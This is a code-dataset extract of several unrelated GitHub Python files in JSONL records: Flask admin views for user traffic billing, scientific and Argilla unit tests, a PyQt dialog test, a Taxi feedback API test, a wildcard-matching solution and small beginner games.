1:\n left = \"\"\n else:\n left = \"({0} days left)\".format(relativedelta(user.expired, datetime.now()).days)\n users.append({\"id\":user.id, \"name\":user.name, \"payday\":user.payday, \"package\":package.name, \"package_traffic\":package.traffic, \\\n \"expired\":user.expired.strftime(\"%y-%m-%d\"), \"left\":left, \"status\":user.status})\n else:\n users.append({\"id\":user.id, \"name\":user.name, \"payday\":user.payday, \"package_traffic\":package.traffic, \\\n \"package\":package.name, \"expired\":user.expired.strftime(\"%y-%m-%d\"), \"left\":\"\",\"status\":user.status})\n return render_template(\"admin/info/user.html\", users=users)\n\n\n@admin.route(\"/info/runtime\")\ndef admin_user_runtime():\n runtimes = []\n for user in User.query.all():\n if user.status == 'active':\n usertraffic = Usertraffic.query.filter_by(user_id=user.id).filter_by(period=get_period(user.payday)).first()\n if usertraffic is None:\n continue\n runtimes.append({\"name\":user.name, \"package_traffic\":usertraffic.package_traffic, \"expired\":user.expired.strftime(\"%y-%m-%d\"), \\\n \"consume_traffic\":usertraffic.consume_traffic/1024/1024, \"period\":usertraffic.period, \"status\":\"active\"})\n else:\n runtimes.append({\"name\":user.name, \"package_traffic\":0, \"expird\":user.expired.strftime(\"%y-%m-%d\"), \\\n \"consume_traffic\":0, \"period\":\"NA\", \"status\":\"inactive\"})\n return render_template(\"admin/info/runtime.html\", runtimes=runtimes)\n \n\n@admin.route(\"/ops/renewfee\", methods=['GET', 'POST'])\ndef admin_renewfee_user():\n form = RenewfeeForm()\n if form.validate_on_submit():\n user = User.query.filter_by(name=form.name.data).first()\n if user is None:\n return redirect(url_for(\"admin.admin_main\"))\n periods = 1\n expired = None\n if form.renew.data == '1m':\n expired = user.expired + relativedelta(months=+1)\n elif form.renew.data == '3m':\n expired = user.expired + relativedelta(months=+3)\n periods = 3\n elif form.renew.data == '6m':\n expired = user.expired + relativedelta(months=+6)\n periods = 6\n elif form.renew.data == '1y':\n expired = user.expired + relativedelta(years=+1)\n periods = 12\n else:\n pass\n package = Package.query.filter_by(id = user.package_id).first()\n for p in range(0, periods):\n period = (user.expired + relativedelta(months=+p)).strftime(\"%y-%m-%d\")\n usertraffic = Usertraffic(package_traffic=package.traffic, period=period, user_id=user.id)\n db.session.add(usertraffic)\n db.session.commit()\n\n user.expired = expired\n db.session.add(user)\n db.session.commit()\n return redirect(url_for(\"admin.admin_main\"))\n else:\n return render_template(\"admin/ops/renewfee.html\", form=form)\n\n\n@admin.route(\"/ops/renewtraffic\", methods=['GET', 'POST'])\ndef admin_renewtraffic_user():\n form = RenewTrafficForm()\n if form.validate_on_submit():\n user = User.query.filter_by(name = form.name.data).first()\n if user is None:\n return \"ok\", 404\n usertraffic = Usertraffic.query.filter_by(user_id=user.id).filter_by(period=get_period(user.payday)).first()\n if usertraffic is None:\n return \"ok\", 404\n usertraffic.package_traffic = usertraffic.package_traffic + int(form.traffic.data)\n db.session.add(usertraffic)\n db.session.commit()\n return redirect(url_for(\"admin.admin_main\"))\n else:\n return render_template(\"admin/ops/renewtraffic.html\", form=form)\n\n\n@admin.route(\"/ops/createuser\", methods=['GET', 'POST'])\ndef admin_create_user():\n form = CreateUserForm()\n packages=[]\n for package in Package.query.all():\n packages.append((str(package.id), package.name))\n form.package.choices = packages\n\n if form.validate_on_submit():\n expired = datetime.now()\n periods = 1\n if form.expired.data == '3d':\n expired = expired + relativedelta(days=+3)\n elif form.expired.data == '1m':\n expired = expired + relativedelta(months=+1)\n elif form.expired.data == '3m':\n expired = expired + relativedelta(months=+3)\n periods = 3\n elif form.expired.data == '6m':\n expired = expired + relativedelta(months=+6)\n periods = 6\n elif form.expired.data == '1y':\n expired = expired + relativedelta(years=+1)\n periods = 12\n else:\n pass\n user = User(name=form.name.data, password = form.password.data,\n payday = int(datetime.now().day), package_id = int(form.package.data),\n expired = datetime(expired.year, expired.month, expired.day, 0, 0, 0), status=\"active\")\n db.session.add(user)\n db.session.commit()\n package = Package.query.filter_by(id = form.package.data).first()\n for p in range(0, periods):\n period = (datetime.now() + relativedelta(months=+p)).strftime(\"%y-%m-%d\")\n usertraffic = Usertraffic(package_traffic=package.traffic, period=period, user_id=user.id)\n db.session.add(usertraffic)\n db.session.commit()\n return redirect(url_for(\"admin.admin_main\"))\n else:\n return render_template(\"admin/ops/create_user.html\", form=form)\n\n\n@admin.route(\"/ops/deactiveuser\", methods=['GET', 'POST'])\ndef admin_deactive_user():\n form = DeactiveUserForm()\n if form.validate_on_submit():\n user = User.query.filter_by(name=form.name.data).first()\n if user is None:\n return \"ok\", 404\n for usertraffic in user.traffics.all():\n db.session.delete(usertraffic)\n db.session.commit()\n user.status = \"inactive\"\n db.session.add(user)\n db.session.commit()\n return redirect(url_for(\"admin.admin_main\"))\n else:\n return render_template(\"admin/ops/deactive_user.html\", form=form)\n\n\n@admin.route(\"/ops/activeuser\", methods=['POST', 'GET'])\ndef admin_active_user():\n form = ActiveUserForm()\n packages=[]\n for package in Package.query.all():\n packages.append((str(package.id), package.name))\n form.package.choices = packages\n\n if form.validate_on_submit():\n expired = datetime.now()\n periods = 1\n if form.expired.data == '1m':\n expired = expired + relativedelta(months=+1)\n elif form.expired.data == '3m':\n expired = expired + relativedelta(months=+3)\n periods = 3\n elif form.expired.data == '6m':\n expired = expired + relativedelta(months=+6)\n periods = 6\n elif form.expired.data == '1y':\n expired = expired + relativedelta(years=+1)\n periods = 12\n else:\n pass\n user = User.query.filter_by(name=form.name.data).first()\n user.payday = int(datetime.now().day)\n user.package_id = int(form.package.data)\n user.expired = datetime(expired.year, expired.month, expired.day, 0, 0, 0)\n user.status = \"active\"\n db.session.add(user)\n db.session.commit()\n\n package = Package.query.filter_by(id = form.package.data).first()\n for p in range(0, periods):\n period = (datetime.now() + relativedelta(months=+p)).strftime(\"%y-%m-%d\")\n usertraffic = Usertraffic(package_traffic=package.traffic, period=period, user_id=user.id)\n db.session.add(usertraffic)\n db.session.commit()\n return redirect(url_for(\"admin.admin_main\"))\n else:\n return render_template(\"admin/ops/active_user.html\", form=form)\n\n@admin.route(\"/startuserlog\", methods=['POST'])\ndef admin_start_user_log():\n start = datetime.now()\n user = User.query.filter_by(name=request.form['user']).first()\n if user is None:\n return \"ok\", 404\n userlog = Userlog(interface=request.form['interface'], status=\"up\",\n start=datetime(start.year, start.month, start.day, start.hour, start.minute, start.second),\n end=datetime(start.year, start.month, start.day, 0, 0, 0), traffic=0, user_id=user.id)\n db.session.add(userlog)\n db.session.commit()\n return \"ok\", 200\n\n\n@admin.route(\"/stopuserlog\", methods=['POST'])\ndef admin_stop_user_log():\n end = datetime.now()\n userlog = Userlog.query.filter_by(interface=request.form[\"interface\"]).filter_by(status='up').first()\n if userlog is None:\n return \"ok\", 404\n userlog.end = datetime(end.year, end.month, end.day, end.hour, end.minute, end.second)\n userlog.status = 'down'\n userlog.traffic = int(request.form['traffic'])\n db.session.add(userlog)\n db.session.commit()\n\n user = User.query.filter_by(id=userlog.user_id).first()\n usertraffic = Usertraffic.query.filter_by(user_id=userlog.user_id).filter_by(period=get_period(user.payday)).first()\n usertraffic.consume_traffic = usertraffic.consume_traffic + int(request.form[\"traffic\"])\n db.session.add(usertraffic)\n db.session.commit()\n return \"ok\", 200\n","repo_name":"sharkconi/cross","sub_path":"app/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11606940037","text":"import numpy as np\n\nfrom yt.analysis_modules.level_sets.api import \\\n Clump, \\\n find_clumps, \\\n get_lowest_clumps\nfrom yt.frontends.stream.api import \\\n load_uniform_grid\nfrom yt.testing import \\\n assert_array_equal, \\\n assert_equal\n\ndef test_clump_finding():\n n_c = 8\n n_p = 1\n dims = (n_c, n_c, n_c)\n\n density = np.ones(dims)\n high_rho = 10.\n # add a couple disconnected density enhancements\n density[2, 2, 2] = high_rho\n density[6, 6, 6] = high_rho\n\n # put a particle at the center of one of them\n dx = 1. / n_c\n px = 2.5 * dx * np.ones(n_p)\n \n data = {\"density\": density,\n \"particle_mass\": np.ones(n_p),\n \"particle_position_x\": px,\n \"particle_position_y\": px,\n \"particle_position_z\": px,\n \"number_of_particles\": n_p}\n\n ds = load_uniform_grid(data, dims)\n\n ad = ds.all_data()\n master_clump = Clump(ad, (\"gas\", \"density\"))\n master_clump.add_validator(\"min_cells\", 1)\n\n find_clumps(master_clump, 0.5, 2. * high_rho, 10.)\n\n # there should be two children\n assert_equal(len(master_clump.children), 2)\n\n leaf_clumps = get_lowest_clumps(master_clump)\n # two leaf clumps\n assert_equal(len(leaf_clumps), 2)\n\n\n # check some clump fields\n assert_equal(master_clump.children[0][\"density\"][0].size, 1)\n assert_equal(master_clump.children[0][\"density\"][0], ad[\"density\"].max())\n assert_equal(master_clump.children[0][\"particle_mass\"].size, 1)\n assert_array_equal(master_clump.children[0][\"particle_mass\"], ad[\"particle_mass\"])\n assert_equal(master_clump.children[1][\"density\"][0].size, 1)\n assert_equal(master_clump.children[1][\"density\"][0], ad[\"density\"].max())\n assert_equal(master_clump.children[1][\"particle_mass\"].size, 0)\n","repo_name":"bkhamesra/yt-EinsteinToolkit","sub_path":"yt/analysis_modules/level_sets/tests/test_clump_finding.py","file_name":"test_clump_finding.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"19855009973","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QMessageBox\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import pyqtSlot\n\n\nclass App(QWidget):\n\n def __init__(self):\n super().__init__()\n self.title = 'PyQt5 messagebox - pythonspot.com'\n self.left = 10\n self.top = 10\n self.width = 320\n self.height = 200\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n\n self.show()\n\n def lockin_error_window(self, error_message):\n print('Trying to generate error_message_window')\n # error_message_window('WARNING - Lock-in Status Issues',\n # inform_text='Something is wrong with the lockin.\\n LIAS? Response is: '\n # + str(error_message) + '\\nContinue Anyway?')\n\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Warning)\n msg.setText('Lock-in Status Register Flagged Issue(s)')\n msg.setInformativeText('One or more lock-in issues are present which may affect your results.\\n'\n 'LIA Status Register Value is: ' + str(error_message) + '\\n\\nContinue Anyway?')\n msg.setWindowTitle(' - Warning - ')\n msg.setStandardButtons(QMessageBox.Ok | QMessageBox.Abort)\n # msg.buttonClicked.connect(msgbtn)\n return_value = msg.exec()\n print('msg.clickedButton(): ' + str(msg.clickedButton()))\n print('msg box return value: ' + str(return_value))\n if return_value == QMessageBox.Abort:\n print('Abort pressed')\n elif return_value == QMessageBox.Ok:\n print('OK pressed')\n\n def print_test(self):\n print('test')\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = App()\n ex.lockin_error_window(3)\n sys.exit(app.exec_())\n\n","repo_name":"NREL/QIS","sub_path":"PADMR/padmr/tests/q_message_box_test.py","file_name":"q_message_box_test.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"33642943982","text":"import json\n\nimport pytest\n\n\ndef call(taxi_feedback, path, request):\n return taxi_feedback.post(\n '/1.0/{}'.format(path),\n request,\n headers={'YaTaxi-Api-Key': 'feedback_apikey'},\n )\n\n\n@pytest.mark.now('2018-08-10T21:01:30+0300')\n@pytest.mark.config(\n FEEDBACK_SAVE_MODE='feedbacks',\n FEEDBACK_RETRIEVE_FROM_DBFEEDBACK=True,\n EXCLUDED_DRIVERS_PERSONAL_DATA_WRITE_MODE={\n '__default__': 'old_way',\n 'feedback_save': 'both_fallback',\n },\n)\ndef test_one(taxi_feedback, mockserver):\n @mockserver.json_handler('/personal/v1/driver_licenses/store')\n def mock_personal_store(request):\n request_json = json.loads(request.get_data())\n assert 'value' in request_json\n return {\n 'id': request_json['value'] + 'ID',\n 'value': request_json['value'],\n }\n\n retrieve_request = {'order_id': 'order_id', 'from_archive': False}\n response = call(taxi_feedback, 'retrieve', retrieve_request)\n assert response.status_code == 404\n\n save_request = {\n 'id': 'user_id',\n 'phone_id': '123456789012345678901234',\n 'order_id': 'order_id',\n 'rating': 3,\n 'msg': 'message',\n 'call_me': True,\n 'app_comment': False,\n 'created_time': '2018-08-10T21:01:30+0300',\n 'choices': [{'type': 'low_rating_reason', 'value': 'rudedriver'}],\n 'badges': [],\n 'allow_overwrite': True,\n 'order_city': 'Москва',\n 'order_created_time': '2018-08-10T21:01:30+0300',\n 'order_cancelled': False,\n 'order_completed': False,\n 'order_finished_for_client': True,\n 'driver_license': 'AB0254',\n }\n response = call(taxi_feedback, 'save', save_request)\n assert response.status_code == 200\n assert response.json() == {}\n\n response = call(taxi_feedback, 'retrieve', retrieve_request)\n assert response.status_code == 200\n data = response.json()\n assert data == {\n 'rating': 3,\n 'msg': 'message',\n 'call_me': True,\n 'choices': [{'type': 'low_rating_reason', 'value': 'rudedriver'}],\n 'is_after_complete': False,\n 'app_comment': False,\n }\n\n wanted_push_request = {\n 'id': 'user_id',\n 'phone_id': '123456789012345678901234',\n 'order_id': 'order_id',\n 'order_created': '2018-08-09T16:31:13+0000',\n 'order_due': '2018-08-09T16:31:14+0000',\n 'order_completed': '2018-08-10T16:31:15+0000',\n 'park_id': 'park_id',\n }\n response = call(taxi_feedback, 'wanted/push', wanted_push_request)\n assert response.status_code == 409\n\n wanted_push_request['switched_to_card'] = True\n response = call(taxi_feedback, 'wanted/push', wanted_push_request)\n assert response.status_code == 200\n assert response.json() == {}\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/testsuite/feedback/test_complex.py","file_name":"test_complex.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17383389693","text":"class Player:\n name = None\n points = 10\n m_games_won = 0\n m_games_lose = 0\n record_counter = 999\n b_games_won = 0\n b_games_lose = 0\n b_games_return = 0\n\n def __init__(self, name, points=10, m_games_won=0, m_games_lose=0,\n record_counter=999, b_games_won=0, b_games_lose=0, b_games_return=0):\n self.name = name\n self.points = points\n self.m_games_won = m_games_won\n self.m_games_lose = m_games_lose\n self.record_counter = record_counter\n self.b_games_won = b_games_won\n self.b_games_lose = b_games_lose\n self.b_games_return = b_games_return\n\n @property\n def m_games_played(self):\n return self.m_games_won + self.m_games_lose\n\n @property\n def m_win_rate(self):\n if self.m_games_played:\n return round(self.m_games_won / self.m_games_played, 2)\n else:\n return '-'\n\n @property\n def b_games_played(self):\n return self.b_games_won + self.b_games_lose + self.b_games_return\n\n @property\n def b_win_rate(self):\n if self.b_games_played:\n return round(self.b_games_won / self.b_games_played, 2)\n else:\n return '-'\n\n def print_stat(self):\n print(\n f'\\nPlayer name: {self.name}'\n f'\\nPlayer points: {self.points}'\n '\\n\\nMagic'\n f'\\nTotal games played: {self.m_games_played}'\n f'\\nGames won: {self.m_games_won}'\n f'\\nWin rate: {self.m_win_rate}'\n f'\\nRecord number of attempts: {self.record_counter}'\n '\\n\\nBlackjack'\n f'\\nTotal games played: {self.b_games_played}'\n f'\\nGames won: {self.b_games_won}'\n f'\\nWin rate: {self.b_win_rate}'\n )\n","repo_name":"annetDe/studying_python_basic","sub_path":"coursework/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9653583231","text":"from typing import TYPE_CHECKING\nfrom uuid import UUID\n\nimport pytest\nfrom argilla.client.api import ArgillaSingleton\nfrom argilla.client.sdk.users.models import UserRole\nfrom argilla.client.sdk.v1.workspaces.models import WorkspaceModel as WorkspaceModelV1\nfrom argilla.client.sdk.workspaces.models import WorkspaceModel as WorkspaceModelV0\nfrom argilla.client.users import User\n\nif TYPE_CHECKING:\n from argilla.server.models import User as ServerUser\n\nfrom tests.factories import UserFactory, WorkspaceFactory\n\n\ndef test_user_cls_init() -> None:\n with pytest.raises(\n Exception,\n match=r\"`User` cannot be initialized via the `__init__` method | you should use `User.from_name\\('test_user'\\)`\",\n ):\n User(name=\"test_user\")\n\n with pytest.raises(\n Exception,\n match=r\"`User` cannot be initialized via the `__init__` method | you should use `User.from_id\\('00000000-0000-0000-0000-000000000000'\\)`\",\n ):\n User(id=\"00000000-0000-0000-0000-000000000000\")\n\n\n@pytest.mark.asyncio\nasync def test_user_from_name(owner: \"ServerUser\") -> None:\n new_user = await UserFactory.create(username=\"test_user\")\n ArgillaSingleton.init(api_key=owner.api_key)\n\n user = User.from_name(new_user.username)\n assert user.username == new_user.username\n assert isinstance(user.id, UUID)\n\n with pytest.raises(ValueError, match=\"User with username=\"):\n User.from_name(\"non-existing-user\")\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_from_name_not_allowed_role(role: UserRole) -> None:\n user = await UserFactory.create(role=role)\n ArgillaSingleton.init(api_key=user.api_key)\n\n with pytest.raises(PermissionError, match=f\"User with role={role} is not allowed to call `from_name`\"):\n User.from_name(name=user.username)\n\n\n@pytest.mark.asyncio\nasync def test_user_from_id(owner: \"ServerUser\") -> None:\n new_user = await UserFactory.create(username=\"test_user\")\n ArgillaSingleton.init(api_key=owner.api_key)\n\n user = User.from_id(id=new_user.id)\n assert user.username == \"test_user\"\n assert isinstance(user.id, UUID)\n\n with pytest.raises(ValueError, match=\"User with id=\"):\n User.from_id(id=\"00000000-0000-0000-0000-000000000000\")\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_from_id_not_allowed_role(role: UserRole) -> None:\n user = await UserFactory.create(role=role)\n ArgillaSingleton.init(api_key=user.api_key)\n\n with pytest.raises(PermissionError, match=f\"User with role={role} is not allowed to call `from_id`\"):\n User.from_id(id=user.id)\n\n\ndef test_user_me(owner: \"ServerUser\") -> None:\n ArgillaSingleton.init(api_key=owner.api_key)\n\n user = User.me()\n assert user.id == owner.id\n assert user.username == owner.username\n\n\n@pytest.mark.asyncio\nasync def test_user_create(owner: \"ServerUser\") -> None:\n workspace = await WorkspaceFactory.create(name=\"test_workspace\")\n\n ArgillaSingleton.init(api_key=owner.api_key)\n\n with pytest.warns(UserWarning):\n new_user = User.create(\"test_user\", password=\"test_password\", workspaces=[\"test_workspace\"])\n assert new_user.first_name == \"test_user\"\n assert new_user.last_name is None\n assert new_user.full_name == \"test_user\"\n assert new_user.username == \"test_user\"\n assert new_user.workspaces == [\n WorkspaceModelV1(\n id=workspace.id,\n name=workspace.name,\n inserted_at=workspace.inserted_at,\n updated_at=workspace.updated_at,\n )\n ]\n\n with pytest.raises(KeyError, match=\"already exists in Argilla\"):\n User.create(\"test_user\", password=\"test_password\")\n\n\ndef test_user_create_with_non_existent_workspace(owner: \"ServerUser\") -> None:\n ArgillaSingleton.init(api_key=owner.api_key)\n\n with pytest.raises(ValueError, match=\"^(.*)Workspace 'non_existent_workspace' does not exist$\"):\n User.create(\"test_user\", password=\"test_password\", workspaces=[\"non_existent_workspace\"])\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_create_not_allowed_role(role: UserRole) -> None:\n user = await UserFactory.create(role=role)\n ArgillaSingleton.init(api_key=user.api_key)\n\n with pytest.raises(PermissionError, match=f\"User with role={role} is not allowed to call `create`\"):\n User.create(\"test_user\", password=\"test_password\", role=role)\n\n\n@pytest.mark.asyncio\nasync def test_user_list(owner: \"ServerUser\") -> None:\n await UserFactory.create(username=\"user_1\")\n await UserFactory.create(username=\"user_2\")\n ArgillaSingleton.init(api_key=owner.api_key)\n\n users = User.list()\n assert all(user.username in [\"user_1\", \"user_2\", owner.username] for user in users)\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_list_not_allowed_role(role: UserRole) -> None:\n user = await UserFactory.create(role=role)\n ArgillaSingleton.init(api_key=user.api_key)\n\n with pytest.raises(PermissionError, match=f\"User with role={role} is not allowed to call `list`\"):\n User.list()\n\n\n@pytest.mark.asyncio\nasync def test_user_delete_user(owner: \"ServerUser\") -> None:\n new_user = await UserFactory.create(username=\"test_user\")\n ArgillaSingleton.init(api_key=owner.api_key)\n\n user = User.from_name(\"test_user\")\n assert user.username == new_user.username\n\n user.delete()\n with pytest.raises(ValueError, match=\"doesn't exist in Argilla\"):\n user.delete()\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_delete_not_allowed_role(role: UserRole) -> None:\n user = await UserFactory.create(role=role)\n ArgillaSingleton.init(api_key=user.api_key)\n\n user = User.me()\n with pytest.raises(PermissionError, match=f\"User with role={role} is not allowed to call `delete`\"):\n user.delete()\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.owner, UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_repr(role: UserRole) -> None:\n user = await UserFactory.create(role=role)\n ArgillaSingleton.init(api_key=user.api_key)\n\n assert str(User.me()) == (\n f\"User(id={user.id}, username={user.username}, role={user.role},\"\n f\" api_key={user.api_key}, first_name={user.first_name},\"\n f\" last_name={user.last_name}, inserted_at={user.inserted_at},\"\n f\" updated_at={user.updated_at})\"\n )\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.owner, UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_workspaces(role: UserRole) -> None:\n workspaces = await WorkspaceFactory.create_batch(3)\n user = await UserFactory.create(role=role, workspaces=workspaces)\n ArgillaSingleton.init(api_key=user.api_key)\n\n user = User.me()\n assert isinstance(user.workspaces, list)\n assert len(user.workspaces) == len(workspaces)\n assert all(isinstance(workspace, (WorkspaceModelV0, WorkspaceModelV1)) for workspace in user.workspaces)\n assert [workspace.name for workspace in workspaces] == [workspace.name for workspace in user.workspaces]\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_workspaces_from_owner_to_any(owner: \"ServerUser\", role: UserRole) -> None:\n workspaces = await WorkspaceFactory.create_batch(3)\n user = await UserFactory.create(role=role, workspaces=workspaces)\n ArgillaSingleton.init(api_key=owner.api_key)\n\n user = User.from_name(user.username)\n assert isinstance(user.workspaces, list)\n assert len(user.workspaces) == len(workspaces)\n assert all(isinstance(workspace, (WorkspaceModelV0, WorkspaceModelV1)) for workspace in user.workspaces)\n assert [workspace.name for workspace in workspaces] == [workspace.name for workspace in user.workspaces]\n\n\n@pytest.mark.parametrize(\n \"role, is_owner, is_admin, is_annotator\",\n [\n (UserRole.owner, True, False, False),\n (UserRole.admin, False, True, False),\n (UserRole.annotator, False, False, True),\n ],\n)\n@pytest.mark.asyncio\nasync def test_user_role_property(\n role: UserRole, owner: \"ServerUser\", is_owner: bool, is_admin: bool, is_annotator: bool\n) -> None:\n user = await UserFactory.create(role=role)\n\n ArgillaSingleton.init(api_key=owner.api_key)\n\n user = User.from_name(user.username)\n assert user.is_owner == is_owner\n assert user.is_admin == is_admin\n assert user.is_annotator == is_annotator\n","repo_name":"argilla-io/argilla","sub_path":"tests/integration/client/test_users.py","file_name":"test_users.py","file_ext":"py","file_size_in_byte":8671,"program_lang":"python","lang":"en","doc_type":"code","stars":2619,"dataset":"github-code","pt":"66"} +{"seq_id":"17680790638","text":"import re\r\nclass Solution:\r\n def isMatch(self, s, p):\r\n \"\"\"\r\n :type s: str\r\n :type p: str\r\n :rtype: bool\r\n \"\"\"\r\n # 将p中多个连续的*转换为一个,并将p转换为re需要的形式\r\n temp = []\r\n for i in range(len(p)):\r\n if p[i] == '*' and p[i-1] == '*' and i > 0:\r\n continue\r\n elif p[i] == '*':\r\n temp.append('[a-z]*')\r\n elif p[i] == '?':\r\n temp.append('.')\r\n else:\r\n temp.append(p[i])\r\n p_trans = ''\r\n for e in temp:\r\n p_trans += e\r\n print('p:', p_trans)\r\n\r\n # # 将p转换为re需要的形式\r\n # p1 = []\r\n # for i in range(len(p)):\r\n # if p[i] == '*':\r\n # p1.append('[a-z]*')\r\n # elif p[i] == '?':\r\n # p1.append('.')\r\n # else:\r\n # p1.append(p[i])\r\n # p_trans = ''\r\n # for e in p1:\r\n # p_trans += e\r\n # print('p_trans:', p_trans)\r\n try:\r\n span = re.search(p_trans, s).span()\r\n if span[0] == 0 and span[1] == len(s):\r\n return True\r\n except:\r\n return False\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n sol = Solution()\r\n # s = \"aa\"\r\n # p = \"*\"\r\n\r\n # s = \"adceb\"\r\n # p = \"*a*b\"\r\n\r\n # s = \"acdcb\"\r\n # p = \"a*c?b\"\r\n\r\n # s = \"aaaabaaaabbbbaabbbaabbaababbabbaaaababaaabbbbbbaabbbabababbaaabaabaaaaaabbaabbbbaababbababaabbbaababbbba\"\r\n # p = \"*****b*aba***babaa*bbaba***a*aaba*b*aa**a*b**ba***a*a*\"\r\n #\r\n s = \"aabbbaaaabbbabbabaaabaaabababbbbbaaababbbababaaaaaabbabaaaababbbababababbbbabaaaaabbabbabbbbbabbabaaaa\"\r\n p = \"b***bbb*b*bb***a*ba*b**aab*abb**aabb**a**baba*b*abbba\"\r\n print(sol.isMatch(s, p))","repo_name":"huangjianyu111/leetcode-python","sub_path":"wildcard_matching_2.py","file_name":"wildcard_matching_2.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"276052174","text":"import random\r\n\r\n# Rock Paper Scissors\r\nR = \"rock\"\r\nP = \"paper\"\r\nS = \"scissors\"\r\n\r\nuser_win = 0\r\ncomp_win = 0\r\n\r\nwhile True: # Start an outer loop for the entire game\r\n \r\n x = input(\"rock, paper, scissors? (Type 'quit' to exit): \").lower()\r\n if x == 'quit':\r\n break # Exit the game loop if the user wants to quit\r\n \r\n choice = random.choice([R, P, S])\r\n print(f\"Computer chose: {choice}\")\r\n \r\n if choice == x:\r\n print(\"It was a draw\")\r\n elif x == R:\r\n if choice == S:\r\n print(\"You win\")\r\n user_win += 1\r\n print(\"Your score is: \", str(user_win))\r\n print(\"Computer score is: \", str(comp_win))\r\n else:\r\n print(\"You lose\")\r\n comp_win += 1\r\n print(\"Your score is: \", str(user_win))\r\n print(\"Computer score is: \", str(comp_win))\r\n elif x == P:\r\n if choice == R:\r\n print(\"You win\")\r\n user_win += 1\r\n print(\"Your score is: \", str(user_win))\r\n print(\"Computer score is: \", str(comp_win))\r\n else:\r\n print(\"You lose\")\r\n comp_win += 1\r\n print(\"Your score is: \", str(user_win))\r\n print(\"Computer score is: \", str(comp_win))\r\n elif x == S:\r\n if choice == P:\r\n print(\"You win\")\r\n user_win += 1\r\n print(\"Your score is: \", str(user_win))\r\n print(\"Computer score is: \", str(comp_win))\r\n else:\r\n print(\"You lose\")\r\n comp_win += 1\r\n print(\"Your score is: \", str(user_win))\r\n print(\"Computer score is: \", str(comp_win))\r\n else:\r\n print(\"Invalid input. Please choose rock, paper, or scissors.\")\r\n \r\n play_again = input(\"Do you want to play again? (yes/no): \").lower()\r\n if play_again != 'yes':\r\n break # Exit the game loop if the user doesn't want to play again\r\n\r\n\r\n# TIC TAC TOE GAME\r\ndef print_board(board):\r\n for row in board:\r\n print(\"|\".join(row))\r\n print(\"-\" * 5)\r\n\r\ndef check_winner(board, player):\r\n for i in range(3):\r\n if all(board[i][j] == player for j in range(3)):\r\n return True\r\n if all(board[j][i] == player for j in range(3)):\r\n return True\r\n\r\n if all(board[i][i] == player for i in range(3)):\r\n return True\r\n\r\n if all(board[i][2-i] == player for i in range(3)):\r\n return True\r\n\r\n return False\r\n\r\ndef is_board_full(board):\r\n for row in board:\r\n for cell in row:\r\n if cell == \" \":\r\n return False\r\n return True\r\n\r\ndef get_move():\r\n while True:\r\n try:\r\n row = int(input(\"Enter the row (0-2): \"))\r\n col = int(input(\"Enter the column (0-2): \"))\r\n if 0 <= row < 3 and 0 <= col < 3:\r\n return row, col\r\n print(\"Invalid input. Row and column must be between 0 and 2.\")\r\n except ValueError:\r\n print(\"Invalid input. Please enter a number.\")\r\n\r\ndef play_tic_tac_toe():\r\n board = [[\" \" for _ in range(3)] for _ in range(3)]\r\n players = [\"X\", \"O\"]\r\n current_player = 0\r\n\r\n print(\"Welcome to Tic Tac Toe!\")\r\n print_board(board)\r\n\r\n for _ in range(9):\r\n player = players[current_player]\r\n print(f\"Player {player}'s turn.\")\r\n row, col = get_move()\r\n\r\n while board[row][col] != \" \":\r\n print(\"Cell already taken. Try again.\")\r\n row, col = get_move()\r\n\r\n board[row][col] = player\r\n print_board(board)\r\n\r\n if check_winner(board, player):\r\n print(f\"Player {player} wins!\")\r\n return\r\n\r\n if is_board_full(board):\r\n print(\"It's a tie!\")\r\n return\r\n\r\n current_player = 1 - current_player\r\n\r\nif __name__ == \"__main__\":\r\n play_tic_tac_toe()\r\n\r\n#calculator\r\n\r\ndef add(a, b):\r\n answer = a + b\r\n print(a, b )\r\n\r\ndef sub(a, b):\r\n answer = a - b\r\n print(a, b )\r\n\r\ndef mul(a, b):\r\n answer = a * b\r\n print(a, b )\r\n\r\ndef div(a, b):\r\n answer = a / b\r\n print(a, b )\r\n\r\nwhile True:\r\n print(\"A. Addition\")\r\n print(\"B. Subtraction\")\r\n print(\"C. Multiplication\")\r\n print(\"D. Division\")\r\n print(\"E. Exit\")\r\n\r\n choice = input(\"Input your operation: \")\r\n \r\n 